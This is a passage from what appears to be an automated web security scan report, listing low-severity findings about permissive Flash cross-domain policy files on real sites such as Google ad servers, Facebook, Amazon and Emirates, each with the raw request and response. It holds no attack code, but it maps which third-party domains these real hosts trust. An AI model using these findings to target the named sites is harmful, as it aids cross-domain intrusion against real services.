Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: netspiderads3.indiatimes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31104000
Content-Length: 315
Content-Type: text/xml
Last-Modified: Thu, 15 Oct 2009 04:36:50 GMT
Accept-Ranges: bytes
ETag: "bc7db71c514dca1:405"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:35:22 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.indiatimes.com"/>
<allow-access-from domain="*.timesgroup.com"/>
<allow-access-from domain="http://192.160.61.161"/>
<allow-http-request-headers-
...[SNIP]...

7.125. http://open.ad.yieldmanager.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://open.ad.yieldmanager.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: open.ad.yieldmanager.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:17:31 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 03 Feb 2011 22:39:36 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

7.126. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:38:16 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

7.127. http://p.opt.fimserve.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Type: application/xml
Content-Length: 695
Date: Sun, 04 Sep 2011 11:06:39 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...

7.128. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:22:51 GMT
Expires: Sun, 04 Sep 2011 23:22:51 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 11253
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.129. http://picasaweb.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 04:17:58 GMT
Date: Sun, 04 Sep 2011 04:17:58 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

7.130. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:06:18 GMT
Expires: Sun, 04 Sep 2011 23:06:18 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 18717

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.131. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.148.190
X-Cnection: close
Date: Sun, 04 Sep 2011 04:01:08 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

7.132. http://timesofindia.indiatimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: timesofindia.indiatimes.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
Last-Modified: Thu, 18 Aug 2011 03:58:15 GMT
ETag: "10141a3-317-4aabf9f4de3c0"
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:29:01 GMT
Content-Length: 791
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
    <allow-access-from domain="*.indiatimes.com" />
    <allow-access-from domain="*.timesgroup.com" />
    <allow-access-from domain="*.timesofindia.com" />
    <allow-access-from domain="*.economictimes.com" />
    <allow-access-from domain="*.ethindi.com" />
    <allow-access-from domain="*.etgujarati.com" />
    <allow-access-from domain="*.idiva.com" />
    <allow-access-from domain="*.itimes.com" />
    <allow-access-from domain="*.hotklix.com" />
    <allow-access-from domain="*.absoluteradio.co.in" />
    <allow-access-from domain="*.absoluteradio.co.uk" />
    <allow-access-from domain="*.indiatimes.co.in" />
    <allow-access-from domain="inskindemo.com" />
    <allow-access-from domain="*.gaana.com"/>
...[SNIP]...

7.133. http://www.adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:27 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 11:32:15 GMT
ETag: "1de-4a3771fb8e953"
Accept-Ranges: bytes
Content-Length: 478
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

7.134. http://www.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 04 Sep 2011 10:59:50 GMT
ETag: "32c365-17f-4a9b3b4e52980"
Last-Modified: Thu, 04 Aug 2011 20:20:06 GMT
Server: Apache
Content-Length: 383
Connection: close

<?xml version="1.0"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

7.135. http://www.amazon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.amazon.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:19 GMT
Server: Server
Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT
ETag: "3e0-8d97ef00"
Accept-Ranges: bytes
Content-Length: 992
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="amazon.com" />
...[SNIP]...
<allow-access-from domain="pre-prod.amazon.com" />
<allow-access-from domain="devo.amazon.com" />
<allow-access-from domain="anon.amazon.speedera.net" />
<allow-access-from domain="*.images-amazon.com" />
<allow-access-from domain="*.ssl-images-amazon.com" />
<allow-access-from domain="*.amazon.ca" />
<allow-access-from domain="*.amazon.cn" />
<allow-access-from domain="*.amazon.de" />
<allow-access-from domain="*.amazon.fr" />
<allow-access-from domain="*.amazon.it" />
<allow-access-from domain="*.amazon.jp" />
<allow-access-from domain="*.amazon.co.jp" />
<allow-access-from domain="*.amazon.uk" />
<allow-access-from domain="*.amazon.co.uk" />
...[SNIP]...

7.136. http://www.connect.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.27.17.131
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

7.137. http://www.emirates.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.emirates.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emirates.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 360
Content-Type: text/xml
Expires: Mon, 05 Sep 2011 02:37:11 GMT
Last-Modified: Thu, 11 Aug 2011 13:53:52 GMT
Accept-Ranges: bytes
ETag: "1CC582E1A4E9800"
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:29:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.emirates.com" secure="false" />
...[SNIP]...
<allow-access-from domain="staging.ek.aero" secure="false" />
...[SNIP]...
<allow-access-from domain="*.youtube.com" secure="false" />
...[SNIP]...

7.138. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.201.34
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
